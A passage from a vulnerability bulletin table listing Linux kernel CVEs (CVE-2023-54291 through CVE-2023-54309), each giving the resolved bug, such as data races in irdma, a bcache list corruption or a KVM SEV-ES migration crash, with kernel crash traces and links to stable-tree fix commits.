knlGS:0000000000000000 [ 4761.061765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 4761.067513] CR2: 0000000000000000 CR3: 0000001875270006 CR4: 00000000007706e0 [ 4761.074645] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 4761.081775] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [ 4761.088909] PKRU: 55555554 [ 4761.091620] Call Trace: [ 4761.094074] <TASK> [ 4761.096180] ? __die+0x1f/0x70 [ 4761.099238] ? page_fault_oops+0x171/0x4f0 [ 4761.103340] ? exc_page_fault+0x7b/0x180 [ 4761.107265] ? asm_exc_page_fault+0x22/0x30 [ 4761.111460] ? memcpy_orig+0xc5/0x130 [ 4761.115126] vduse_vdpa_set_vq_affinity+0x3e/0x50 [vduse] [ 4761.120533] virtnet_clean_affinity.part.0+0x3d/0x90 [virtio_net] [ 4761.126635] remove_vq_common+0x1a4/0x250 [virtio_net] [ 4761.131781] virtnet_remove+0x5d/0x70 [virtio_net] [ 4761.136580] virtio_dev_remove+0x3a/0x90 [ 4761.140509] device_release_driver_internal+0x19b/0x200 [ 4761.145742] bus_remove_device+0xc2/0x130 [ 4761.149755] device_del+0x158/0x3e0 [ 4761.153245] ? kernfs_find_ns+0x35/0xc0 [ 4761.157086] device_unregister+0x13/0x60 [ 4761.161010] unregister_virtio_device+0x11/0x20 [ 4761.165543] device_release_driver_internal+0x19b/0x200 [ 4761.170770] bus_remove_device+0xc2/0x130 [ 4761.174782] device_del+0x158/0x3e0 [ 4761.178276] ? __pfx_vdpa_name_match+0x10/0x10 [vdpa] [ 4761.183336] device_unregister+0x13/0x60 [ 4761.187260] vdpa_nl_cmd_dev_del_set_doit+0x63/0xe0 [vdpa] | 2025-12-30 | not yet calculated | CVE-2023-54291 | https://git.kernel.org/stable/c/f9d46429de2a251e1e4962e1bf86c344d6336562 https://git.kernel.org/stable/c/f06cf1e1a503169280467d12d2ec89bf2c30ace7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix data race on CQP request done KCSAN detects a data race on cqp_request->request_done memory location which is accessed locklessly in irdma_handle_cqp_op while being updated in irdma_cqp_ce_handler. Annotate lockless intent with READ_ONCE/WRITE_ONCE to avoid any compiler optimizations like load fusing and/or KCSAN warning. [222808.417128] BUG: KCSAN: data-race in irdma_cqp_ce_handler [irdma] / irdma_wait_event [irdma] [222808.417532] write to 0xffff8e44107019dc of 1 bytes by task 29658 on cpu 5: [222808.417610] irdma_cqp_ce_handler+0x21e/0x270 [irdma] [222808.417725] cqp_compl_worker+0x1b/0x20 [irdma] [222808.417827] process_one_work+0x4d1/0xa40 [222808.417835] worker_thread+0x319/0x700 [222808.417842] kthread+0x180/0x1b0 [222808.417852] ret_from_fork+0x22/0x30 [222808.417918] read to 0xffff8e44107019dc of 1 bytes by task 29688 on cpu 1: [222808.417995] irdma_wait_event+0x1e2/0x2c0 [irdma] [222808.418099] irdma_handle_cqp_op+0xae/0x170 [irdma] [222808.418202] irdma_cqp_cq_destroy_cmd+0x70/0x90 [irdma] [222808.418308] irdma_puda_dele_rsrc+0x46d/0x4d0 [irdma] [222808.418411] irdma_rt_deinit_hw+0x179/0x1d0 [irdma] [222808.418514] irdma_ib_dealloc_device+0x11/0x40 [irdma] [222808.418618] ib_dealloc_device+0x2a/0x120 [ib_core] [222808.418823] __ib_unregister_device+0xde/0x100 [ib_core] [222808.418981] ib_unregister_device+0x22/0x40 [ib_core] [222808.419142] irdma_ib_unregister_device+0x70/0x90 [irdma] [222808.419248] i40iw_close+0x6f/0xc0 [irdma] [222808.419352] i40e_client_device_unregister+0x14a/0x180 [i40e] [222808.419450] i40iw_remove+0x21/0x30 [irdma] [222808.419554] auxiliary_bus_remove+0x31/0x50 [222808.419563] device_remove+0x69/0xb0 [222808.419572] device_release_driver_internal+0x293/0x360 [222808.419582] driver_detach+0x7c/0xf0 [222808.419592] bus_remove_driver+0x8c/0x150 [222808.419600] driver_unregister+0x45/0x70 [222808.419610] auxiliary_driver_unregister+0x16/0x30 [222808.419618] irdma_exit_module+0x18/0x1e [irdma] [222808.419733] __do_sys_delete_module.constprop.0+0x1e2/0x310 [222808.419745] __x64_sys_delete_module+0x1b/0x30 [222808.419755] do_syscall_64+0x39/0x90 [222808.419763] entry_SYSCALL_64_after_hwframe+0x63/0xcd [222808.419829] value changed: 0x01 -> 0x03 | 2025-12-30 | not yet calculated | CVE-2023-54292 | https://git.kernel.org/stable/c/c5b5dbcbf91f769b8eb25f88e32a1522f920f37a https://git.kernel.org/stable/c/5986e96be7d0b82e50a9c6b019ea3f1926fd8764 https://git.kernel.org/stable/c/b8b90ba636e3861665aef9a3eab5fcf92839a2c5 https://git.kernel.org/stable/c/f0842bb3d38863777e3454da5653d80b5fde6321 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bcache: fixup btree_cache_wait list damage We get a kernel crash about "list_add corruption. next->prev should be prev (ffff9c801bc01210), but was ffff9c77b688237c. (next=ffffae586d8afe68)." crash> struct list_head 0xffff9c801bc01210 struct list_head { next = 0xffffae586d8afe68, prev = 0xffffae586d8afe68 } crash> struct list_head 0xffff9c77b688237c struct list_head { next = 0x0, prev = 0x0 } crash> struct list_head 0xffffae586d8afe68 struct list_head struct: invalid kernel virtual address: ffffae586d8afe68 type: "gdb_readmem_callback" Cannot access memory at address 0xffffae586d8afe68 [230469.019492] Call Trace: [230469.032041] prepare_to_wait+0x8a/0xb0 [230469.044363] ? bch_btree_keys_free+0x6c/0xc0 [escache] [230469.056533] mca_cannibalize_lock+0x72/0x90 [escache] [230469.068788] mca_alloc+0x2ae/0x450 [escache] [230469.080790] bch_btree_node_get+0x136/0x2d0 [escache] [230469.092681] bch_btree_check_thread+0x1e1/0x260 [escache] [230469.104382] ? finish_wait+0x80/0x80 [230469.115884] ? bch_btree_check_recurse+0x1a0/0x1a0 [escache] [230469.127259] kthread+0x112/0x130 [230469.138448] ? kthread_flush_work_fn+0x10/0x10 [230469.149477] ret_from_fork+0x35/0x40 bch_btree_check_thread() and bch_dirty_init_thread() may call mca_cannibalize() to cannibalize other cached btree nodes. Only one thread can do it at a time, so the op of other threads will be added to the btree_cache_wait list. We must call finish_wait() to remove op from btree_cache_wait before free it's memory address. Otherwise, the list will be damaged. Also should call bch_cannibalize_unlock() to release the btree_cache_alloc_lock and wake_up other waiters. | 2025-12-30 | not yet calculated | CVE-2023-54293 | https://git.kernel.org/stable/c/bcb295778afda4f2feb0d3c0289a53fd43d5a3a6 https://git.kernel.org/stable/c/cbdd5b3322f7bbe6454c97cac994757f1192c07b https://git.kernel.org/stable/c/25ec4779d0fb3ed9cac1e4d9e0e4261b4a12f6ed https://git.kernel.org/stable/c/2882a4c4f0c90e99f37dbd8db369b9982fd613e7 https://git.kernel.org/stable/c/f0854489fc07d2456f7cc71a63f4faf9c716ffbe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid10: fix memleak of md thread In raid10_run(), if setup_conf() succeed and raid10_run() failed before setting 'mddev->thread', then in the error path 'conf->thread' is not freed. Fix the problem by setting 'mddev->thread' right after setup_conf(). | 2025-12-30 | not yet calculated | CVE-2023-54294 | https://git.kernel.org/stable/c/abf4d67060c8f63caff096e5fca1564bfef1e5d4 https://git.kernel.org/stable/c/3725b35fc0e5e4eea0434ef625f3d92f3059d080 https://git.kernel.org/stable/c/2a65555f7e0f4a05b663879908a991e6d9f81e51 https://git.kernel.org/stable/c/d6cfcf98b824591cffa4c1e9889fb4fa619359fe https://git.kernel.org/stable/c/36ba0c7b86acd9c2ea80a273204d52c21c955471 https://git.kernel.org/stable/c/5d763f708b0f918fb87799e33c25113ae6081216 https://git.kernel.org/stable/c/ec473e82e10d39a02eb59b0b95e546119a3bdb79 https://git.kernel.org/stable/c/f0ddb83da3cbbf8a1f9087a642c448ff52ee9abd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: spi-nor: Fix shift-out-of-bounds in spi_nor_set_erase_type spi_nor_set_erase_type() was used either to set or to mask out an erase type. When we used it to mask out an erase type a shift-out-of-bounds was hit: UBSAN: shift-out-of-bounds in drivers/mtd/spi-nor/core.c:2237:24 shift exponent 4294967295 is too large for 32-bit type 'int' The setting of the size_{shift, mask} and of the opcode are unnecessary when the erase size is zero, as throughout the code just the erase size is considered to determine whether an erase type is supported or not. Setting the opcode to 0xFF was wrong too as nobody guarantees that 0xFF is an unused opcode. Thus when masking out an erase type, just set the erase size to zero. This will fix the shift-out-of-bounds. [ta: refine changes, new commit message, fix compilation error] | 2025-12-30 | not yet calculated | CVE-2023-54295 | https://git.kernel.org/stable/c/e6409208c13f7c56adc12dd795abf4141e3d5e64 https://git.kernel.org/stable/c/61d44a4db2f54dbac7d22c2541574ea5755e0468 https://git.kernel.org/stable/c/53b2916ebde741c657a857fa1936c0d9fcb59170 https://git.kernel.org/stable/c/99341b8aee7b5b4255b339345bbcaa35867dfd0c https://git.kernel.org/stable/c/f0f0cfdc3a024e21161714f2e05f0df3b84d42ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: Get source vCPUs from source VM for SEV-ES intrahost migration Fix a goof where KVM tries to grab source vCPUs from the destination VM when doing intrahost migration. Grabbing the wrong vCPU not only hoses the guest, it also crashes the host due to the VMSA pointer being left NULL. BUG: unable to handle page fault for address: ffffe38687000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] SMP NOPTI CPU: 39 PID: 17143 Comm: sev_migrate_tes Tainted: GO 6.5.0-smp--fff2e47e6c3b-next #151 Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.28.0 07/10/2023 RIP: 0010:__free_pages+0x15/0xd0 RSP: 0018:ffff923fcf6e3c78 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffffe38687000000 RCX: 0000000000000100 RDX: 0000000000000100 RSI: 0000000000000000 RDI: ffffe38687000000 RBP: ffff923fcf6e3c88 R08: ffff923fcafb0000 R09: 0000000000000000 R10: 0000000000000000 R11: ffffffff83619b90 R12: ffff923fa9540000 R13: 0000000000080007 R14: ffff923f6d35d000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff929d0d7c0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffe38687000000 CR3: 0000005224c34005 CR4: 0000000000770ee0 PKRU: 55555554 Call Trace: <TASK> sev_free_vcpu+0xcb/0x110 [kvm_amd] svm_vcpu_free+0x75/0xf0 [kvm_amd] kvm_arch_vcpu_destroy+0x36/0x140 [kvm] kvm_destroy_vcpus+0x67/0x100 [kvm] kvm_arch_destroy_vm+0x161/0x1d0 [kvm] kvm_put_kvm+0x276/0x560 [kvm] kvm_vm_release+0x25/0x30 [kvm] __fput+0x106/0x280 ____fput+0x12/0x20 task_work_run+0x86/0xb0 do_exit+0x2e3/0x9c0 do_group_exit+0xb1/0xc0 __x64_sys_exit_group+0x1b/0x20 do_syscall_64+0x41/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> CR2: ffffe38687000000 | 2025-12-30 | not yet calculated | CVE-2023-54296 | https://git.kernel.org/stable/c/5c18ace750e4d4d58d7da02d1c669bf21c824158 https://git.kernel.org/stable/c/2ee4b180d51b12a45bdd3264629719ef6a572a73 https://git.kernel.org/stable/c/f1187ef24eb8f36e8ad8106d22615ceddeea6097 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: zoned: fix memory leak after finding block group with super blocks At exclude_super_stripes(), if we happen to find a block group that has super blocks mapped to it and we are on a zoned filesystem, we error out as this is not supposed to happen, indicating either a bug or maybe some memory corruption for example. However we are exiting the function without freeing the memory allocated for the logical address of the super blocks. Fix this by freeing the logical address. | 2025-12-30 | not yet calculated | CVE-2023-54297 | https://git.kernel.org/stable/c/ab80a901f8daca07c4a54af0ab0de745c9918294 https://git.kernel.org/stable/c/c35ea606196243063e63785918c7c8fe27c45798 https://git.kernel.org/stable/c/cca627afb463a4b47721eac017516ba200de85c3 https://git.kernel.org/stable/c/f1a07c2b4e2c473ec322b8b9ece071b8c88a3512 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: thermal: intel: quark_dts: fix error pointer dereference If alloc_soc_dts() fails, then we can just return. Trying to free "soc_dts" will lead to an Oops. | 2025-12-30 | not yet calculated | CVE-2023-54298 | https://git.kernel.org/stable/c/0b366c6a42e2e2bc67af8d1130b68f3bfa31c80e https://git.kernel.org/stable/c/d0178f2788fb1183a5cc350213efdc94010b9147 https://git.kernel.org/stable/c/e23f1d9e6e03d04da2f18e78ab5d4255ffeb1333 https://git.kernel.org/stable/c/f73134231fa23e0856c15010db5f5c03693c1e92 https://git.kernel.org/stable/c/5eaf55b38691291d49417c22e726591078ca1893 https://git.kernel.org/stable/c/69e49f1b53605706bc2203455021539aba2ebe21 https://git.kernel.org/stable/c/24c221b11c2894e1a5f07b93362d9bc91c6d8be7 https://git.kernel.org/stable/c/f1b930e740811d416de4d2074da48b6633a672c8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: typec: bus: verify partner exists in typec_altmode_attention Some usb hubs will negotiate DisplayPort Alt mode with the device but will then negotiate a data role swap after entering the alt mode. The data role swap causes the device to unregister all alt modes, however the usb hub will still send Attention messages even after failing to reregister the Alt Mode. type_altmode_attention currently does not verify whether or not a device's altmode partner exists, which results in a NULL pointer error when dereferencing the typec_altmode and typec_altmode_ops belonging to the altmode partner. Verify the presence of a device's altmode partner before sending the Attention message to the Alt Mode driver. | 2025-12-30 | not yet calculated | CVE-2023-54299 | https://git.kernel.org/stable/c/5f71716772b88cbe0e1788f6a38d7871aff2120b https://git.kernel.org/stable/c/38e1f2ee82bacbbfded8f1c06794a443d038d054 https://git.kernel.org/stable/c/0ad6bad31da692f8d7acacab07eabe7586239ae0 https://git.kernel.org/stable/c/0d3b5fe47938e9c451466845304a2bd74e967a80 https://git.kernel.org/stable/c/d49547950bf7f3480d6ca05fe055978e5f0d9e5b https://git.kernel.org/stable/c/1101867a1711c27d8bbe0e83136bec47f8c1ca2a https://git.kernel.org/stable/c/f23643306430f86e2f413ee2b986e0773e79da31 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: avoid referencing uninit memory in ath9k_wmi_ctrl_rx For the reasons also described in commit b383e8abed41 ("wifi: ath9k: avoid uninit memory read in ath9k_htc_rx_msg()"), ath9k_htc_rx_msg() should validate pkt_len before accessing the SKB. For example, the obtained SKB may have been badly constructed with pkt_len = 8. In this case, the SKB can only contain a valid htc_frame_hdr but after being processed in ath9k_htc_rx_msg() and passed to ath9k_wmi_ctrl_rx() endpoint RX handler, it is expected to have a WMI command header which should be located inside its data payload. Implement sanity checking inside ath9k_wmi_ctrl_rx(). Otherwise, uninit memory can be referenced. Tested on Qualcomm Atheros Communications AR9271 802.11n . Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2025-12-30 | not yet calculated | CVE-2023-54300 | https://git.kernel.org/stable/c/0bc12e41af4e3ae1f0efecc377f0514459df0707 https://git.kernel.org/stable/c/28259ce4f1f1f9ab37fa817756c89098213d2fc0 https://git.kernel.org/stable/c/90e3c10177573b8662ac9858abd9bf731d5d98e0 https://git.kernel.org/stable/c/250efb4d3f5b32a115ea6bf25437ba44a1b3c04f https://git.kernel.org/stable/c/ad5425e70789c29b93acafb5bb4629e4eb908296 https://git.kernel.org/stable/c/d1c2ff2bd84c3692c9df267a2b991ce92bfca8ef https://git.kernel.org/stable/c/8ed572e52714593b209e3aa352406aff84481179 https://git.kernel.org/stable/c/75acec91aeaa07375cd5f418069e61b16d39bbad https://git.kernel.org/stable/c/f24292e827088bba8de7158501ac25a59b064953 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: 8250_bcm7271: fix leak in `brcmuart_probe` Smatch reports: drivers/tty/serial/8250/8250_bcm7271.c:1120 brcmuart_probe() warn: 'baud_mux_clk' from clk_prepare_enable() not released on lines: 1032. The issue is fixed by using a managed clock. | 2025-12-30 | not yet calculated | CVE-2023-54301 | https://git.kernel.org/stable/c/5258395e67fee6929fb8e50c8239f8de51b8cb2d https://git.kernel.org/stable/c/2a3e5f428fc4315be6144524912eaefac16f43a9 https://git.kernel.org/stable/c/56a81445b8e4b8906d557518c5dae3ddbb447d1e https://git.kernel.org/stable/c/f264f2f6f4788dc031cef60a0cf2881902736709 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix data race on CQP completion stats CQP completion statistics is read lockesly in irdma_wait_event and irdma_check_cqp_progress while it can be updated in the completion thread irdma_sc_ccq_get_cqe_info on another CPU as KCSAN reports. Make completion statistics an atomic variable to reflect coherent updates to it. This will also avoid load/store tearing logic bug potentially possible by compiler optimizations. [77346.170861] BUG: KCSAN: data-race in irdma_handle_cqp_op [irdma] / irdma_sc_ccq_get_cqe_info [irdma] [77346.171383] write to 0xffff8a3250b108e0 of 8 bytes by task 9544 on cpu 4: [77346.171483] irdma_sc_ccq_get_cqe_info+0x27a/0x370 [irdma] [77346.171658] irdma_cqp_ce_handler+0x164/0x270 [irdma] [77346.171835] cqp_compl_worker+0x1b/0x20 [irdma] [77346.172009] process_one_work+0x4d1/0xa40 [77346.172024] worker_thread+0x319/0x700 [77346.172037] kthread+0x180/0x1b0 [77346.172054] ret_from_fork+0x22/0x30 [77346.172136] read to 0xffff8a3250b108e0 of 8 bytes by task 9838 on cpu 2: [77346.172234] irdma_handle_cqp_op+0xf4/0x4b0 [irdma] [77346.172413] irdma_cqp_aeq_cmd+0x75/0xa0 [irdma] [77346.172592] irdma_create_aeq+0x390/0x45a [irdma] [77346.172769] irdma_rt_init_hw.cold+0x212/0x85d [irdma] [77346.172944] irdma_probe+0x54f/0x620 [irdma] [77346.173122] auxiliary_bus_probe+0x66/0xa0 [77346.173137] really_probe+0x140/0x540 [77346.173154] __driver_probe_device+0xc7/0x220 [77346.173173] driver_probe_device+0x5f/0x140 [77346.173190] __driver_attach+0xf0/0x2c0 [77346.173208] bus_for_each_dev+0xa8/0xf0 [77346.173225] driver_attach+0x29/0x30 [77346.173240] bus_add_driver+0x29c/0x2f0 [77346.173255] driver_register+0x10f/0x1a0 [77346.173272] __auxiliary_driver_register+0xbc/0x140 [77346.173287] irdma_init_module+0x55/0x1000 [irdma] [77346.173460] do_one_initcall+0x7d/0x410 [77346.173475] do_init_module+0x81/0x2c0 [77346.173491] load_module+0x1232/0x12c0 [77346.173506] __do_sys_finit_module+0x101/0x180 [77346.173522] __x64_sys_finit_module+0x3c/0x50 [77346.173538] do_syscall_64+0x39/0x90 [77346.173553] entry_SYSCALL_64_after_hwframe+0x63/0xcd [77346.173634] value changed: 0x0000000000000094 -> 0x0000000000000095 | 2025-12-30 | not yet calculated | CVE-2023-54302 | https://git.kernel.org/stable/c/bf0f9f65b7fe36ea9d2e23263dcefc90255d7b1f https://git.kernel.org/stable/c/4e1a5842a359ee18d5a9e75097d7cf4d93e233bb https://git.kernel.org/stable/c/2623ca92cd8f9668edabe9e4f4a3cf77fd7115f2 https://git.kernel.org/stable/c/f2c3037811381f9149243828c7eb9a1631df9f9c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Disable preemption in bpf_perf_event_output The nesting protection in bpf_perf_event_output relies on disabled preemption, which is guaranteed for kprobes and tracepoints. However bpf_perf_event_output can be also called from uprobes context through bpf_prog_run_array_sleepable function which disables migration, but keeps preemption enabled. This can cause task to be preempted by another one inside the nesting protection and lead eventually to two tasks using same perf_sample_data buffer and cause crashes like: kernel tried to execute NX-protected page - exploit attempt? (uid: 0) BUG: unable to handle page fault for address: ffffffff82be3eea ... Call Trace: ? __die+0x1f/0x70 ? page_fault_oops+0x176/0x4d0 ? exc_page_fault+0x132/0x230 ? asm_exc_page_fault+0x22/0x30 ? perf_output_sample+0x12b/0x910 ? perf_event_output+0xd0/0x1d0 ? bpf_perf_event_output+0x162/0x1d0 ? bpf_prog_c6271286d9a4c938_krava1+0x76/0x87 ? __uprobe_perf_func+0x12b/0x540 ? uprobe_dispatcher+0x2c4/0x430 ? uprobe_notify_resume+0x2da/0xce0 ? atomic_notifier_call_chain+0x7b/0x110 ? exit_to_user_mode_prepare+0x13e/0x290 ? irqentry_exit_to_user_mode+0x5/0x30 ? asm_exc_int3+0x35/0x40 Fixing this by disabling preemption in bpf_perf_event_output. | 2025-12-30 | not yet calculated | CVE-2023-54303 | https://git.kernel.org/stable/c/3654ed5daf492463c3faa434c7000d45c2da2ace https://git.kernel.org/stable/c/a0ac32cf61e5a76e2429e486925a52ee41dd75e3 https://git.kernel.org/stable/c/f2c67a3e60d1071b65848efaa8c3b66c363dd025 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: meson_sm: fix to avoid potential NULL pointer dereference of_match_device() may fail and returns a NULL pointer. Fix this by checking the return value of of_match_device. | 2025-12-30 | not yet calculated | CVE-2023-54304 | https://git.kernel.org/stable/c/fba9c24c196310546f13c77ff66d0741155fa771 https://git.kernel.org/stable/c/9f4017cac70c04090dd4f672e755d6c875af67d8 https://git.kernel.org/stable/c/502dfc5875bab9ae5d6a2939146c2c5e5683be40 https://git.kernel.org/stable/c/bd3a6b6d5dd863dbbe17985c7612159cf4533cad https://git.kernel.org/stable/c/68f3209546b5083f8bffa46f7173cc05191eace1 https://git.kernel.org/stable/c/2d6c4a1a4e6678cb98dd57964f133a995ecc91c1 https://git.kernel.org/stable/c/f2ed165619c16577c02b703a114a1f6b52026df4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: refuse to create ea block when umounted The ea block expansion need to access s_root while it is already set as NULL when umount is triggered. Refuse this request to avoid panic. | 2025-12-30 | not yet calculated | CVE-2023-54305 | https://git.kernel.org/stable/c/aedea161d031502a423ed1c7597754681a4f8cda https://git.kernel.org/stable/c/21f6a80d9234422e2eb445734b22c78fc5bf6719 https://git.kernel.org/stable/c/a92b67e768bde433b9385cde56c09deb58db269e https://git.kernel.org/stable/c/0dc0fa313bb4e86382a3e7125429710d44383196 https://git.kernel.org/stable/c/116008ada3d0de4991099edaf6b8c2e9cd6f225a https://git.kernel.org/stable/c/05cbf6ddd9847c7b4f0662c048f195b09405a9d0 https://git.kernel.org/stable/c/a458a8c1d1fc4e10a1813786132b09a3863ad3f2 https://git.kernel.org/stable/c/f31173c19901a96bb2ebf6bcfec8a08df7095c91 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: tls: avoid hanging tasks on the tx_lock syzbot sent a hung task report and Eric explains that adversarial receiver may keep RWIN at 0 for a long time, so we are not guaranteed to make forward progress. Thread which took tx_lock and went to sleep may not release tx_lock for hours. Use interruptible sleep where possible and reschedule the work if it can't take the lock. Testing: existing selftest passes | 2025-12-30 | not yet calculated | CVE-2023-54306 | https://git.kernel.org/stable/c/bde541a57b4204d0a800afbbd3d1c06c9cdb133f https://git.kernel.org/stable/c/7123a4337bf73132bbfb5437e4dc83ba864a9a1e https://git.kernel.org/stable/c/be5d5d0637fd88c18ee76024bdb22649a1de00d6 https://git.kernel.org/stable/c/1f800f6aae57d2d8f63d32fff383017cbc11cf65 https://git.kernel.org/stable/c/ccf1ccdc5926907befbe880b562b2a4b5f44c087 https://git.kernel.org/stable/c/f3221361dc85d4de22586ce8441ec2c67b454f5d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ptp_qoriq: fix memory leak in probe() Smatch complains that: drivers/ptp/ptp_qoriq.c ptp_qoriq_probe() warn: 'base' from ioremap() not released. Fix this by revising the parameter from 'ptp_qoriq->base' to 'base'. This is only a bug if ptp_qoriq_init() returns on the first -ENODEV error path. For other error paths ptp_qoriq->base and base are the same. And this change makes the code more readable. | 2025-12-30 | not yet calculated | CVE-2023-54307 | https://git.kernel.org/stable/c/46c4993a1514eea3bbc7147d0c81c23cc06c6bed https://git.kernel.org/stable/c/3907fcb5a439933cf8c10d6dc300bc11eba30de3 https://git.kernel.org/stable/c/c0de1a26e6595b0e7969c5b35990a77a2d93104f https://git.kernel.org/stable/c/43b4331ce0cd88ccba425e0702ba35c1a52daccf https://git.kernel.org/stable/c/c960785c8168d0e572101ed921b9be3934ed0bc9 https://git.kernel.org/stable/c/f33642224e38d7e0d59336e10e7b4e370b1c4506 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: ymfpci: Create card with device-managed snd_devm_card_new() snd_card_ymfpci_remove() was removed in commit c6e6bb5eab74 ("ALSA: ymfpci: Allocate resources with device-managed APIs"), but the call to snd_card_new() was not replaced with snd_devm_card_new(). Since there was no longer a call to snd_card_free, unloading the module would eventually result in Oops: [697561.532887] BUG: unable to handle page fault for address: ffffffffc0924480 [697561.532893] #PF: supervisor read access in kernel mode [697561.532896] #PF: error_code(0x0000) - not-present page [697561.532899] PGD ae1e15067 P4D ae1e15067 PUD ae1e17067 PMD 11a8f5067 PTE 0 [697561.532905] Oops: 0000 [#1] PREEMPT SMP NOPTI [697561.532909] CPU: 21 PID: 5080 Comm: wireplumber Tainted: G W OE 6.2.7 #1 [697561.532914] Hardware name: System manufacturer System Product Name/TUF GAMING X570-PLUS, BIOS 4408 10/28/2022 [697561.532916] RIP: 0010:try_module_get.part.0+0x1a/0xe0 [697561.532924] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 55 48 89 e5 41 55 41 54 49 89 fc bf 01 00 00 00 e8 56 3c f8 ff <41> 83 3c 24 02 0f 84 96 00 00 00 41 8b 84 24 30 03 00 00 85 c0 0f [697561.532927] RSP: 0018:ffffbe9b858c3bd8 EFLAGS: 00010246 [697561.532930] RAX: ffff9815d14f1900 RBX: ffff9815c14e6000 RCX: 0000000000000000 [697561.532933] RDX: 0000000000000000 RSI: ffffffffc055092c RDI: ffffffffb3778c1a [697561.532935] RBP: ffffbe9b858c3be8 R08: 0000000000000040 R09: ffff981a1a741380 [697561.532937] R10: ffffbe9b858c3c80 R11: 00000009d56533a6 R12: ffffffffc0924480 [697561.532939] R13: ffff9823439d8500 R14: 0000000000000025 R15: ffff9815cd109f80 [697561.532942] FS: 00007f13084f1f80(0000) GS:ffff9824aef40000(0000) knlGS:0000000000000000 [697561.532945] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [697561.532947] CR2: ffffffffc0924480 CR3: 0000000145344000 CR4: 0000000000350ee0 [697561.532949] Call Trace: [697561.532951] <TASK> [697561.532955] try_module_get+0x13/0x30 [697561.532960] snd_ctl_open+0x61/0x1c0 [snd] [697561.532976] snd_open+0xb4/0x1e0 [snd] [697561.532989] chrdev_open+0xc7/0x240 [697561.532995] ? fsnotify_perm.part.0+0x6e/0x160 [697561.533000] ? __pfx_chrdev_open+0x10/0x10 [697561.533005] do_dentry_open+0x169/0x440 [697561.533009] vfs_open+0x2d/0x40 [697561.533012] path_openat+0xa9d/0x10d0 [697561.533017] ? debug_smp_processor_id+0x17/0x20 [697561.533022] ? trigger_load_balance+0x65/0x370 [697561.533026] do_filp_open+0xb2/0x160 [697561.533032] ? _raw_spin_unlock+0x19/0x40 [697561.533036] ? alloc_fd+0xa9/0x190 [697561.533040] do_sys_openat2+0x9f/0x160 [697561.533044] __x64_sys_openat+0x55/0x90 [697561.533048] do_syscall_64+0x3b/0x90 [697561.533052] entry_SYSCALL_64_after_hwframe+0x72/0xdc [697561.533056] RIP: 0033:0x7f1308a40db4 [697561.533059] Code: 24 20 eb 8f 66 90 44 89 54 24 0c e8 46 68 f8 ff 44 8b 54 24 0c 44 89 e2 48 89 ee 41 89 c0 bf 9c ff ff ff b8 01 01 00 00 0f 05 <48> 3d 00 f0 ff ff 77 32 44 89 c7 89 44 24 0c e8 78 68 f8 ff 8b 44 [697561.533062] RSP: 002b:00007ffcce664450 EFLAGS: 00000293 ORIG_RAX: 0000000000000101 [697561.533066] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f1308a40db4 [697561.533068] RDX: 0000000000080000 RSI: 00007ffcce664690 RDI: 00000000ffffff9c [697561.533070] RBP: 00007ffcce664690 R08: 0000000000000000 R09: 0000000000000012 [697561.533072] R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000080000 [697561.533074] R13: 00007f13054b069b R14: 0000565209f83200 R15: 0000000000000000 [697561.533078] </TASK> | 2025-12-30 | not yet calculated | CVE-2023-54308 | https://git.kernel.org/stable/c/95642872c466030240199ba796a40771c493ed0c https://git.kernel.org/stable/c/db7d7782677ff998c06997903d5400a0ba91cebb https://git.kernel.org/stable/c/255a81a89501df77379b51a81c7a2e8e7c359bc6 https://git.kernel.org/stable/c/f33fc1576757741479452255132d6e3aaf558ffe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: tpm_vtpm_proxy: fix a race condition in /dev/vtpmx creation /dev/vtpmx is made visible before 'workqueue' is initialized, which can lead to a memory corruption in the worst case scenario. Address this by initializing 'workqueue' as the very first step of the driver initialization. | 2025-12-30 | not yet calculated | CVE-2023-54309 | https://git.kernel.org/stable/c/509d21f1c4bb9d35d397fca3226165b156a7639f https://git.kernel.org/stable/c/04e8697d26613ccea760cf57eb20a5a27f788c0f https://git.kernel.org/stable/c/86b9820395f226b8f33cbae9599deebf8af1ce72 https://git.kernel.org/stable/c/9ff7fcb3a2ed0e9b895bb5b4c13872d584a8815b https://git.kernel.org/stable/c/e08295290c53a3cf174c236721747a01b9550ae2 https://git.kernel.org/stable/c/99b998fb9d7d2d2d9dbb3e19db2d0ade02f5a604 https://git.kernel.org/stable/c/092db954e2c3c5ba6c0ce990c7da72cf8f3b9c51 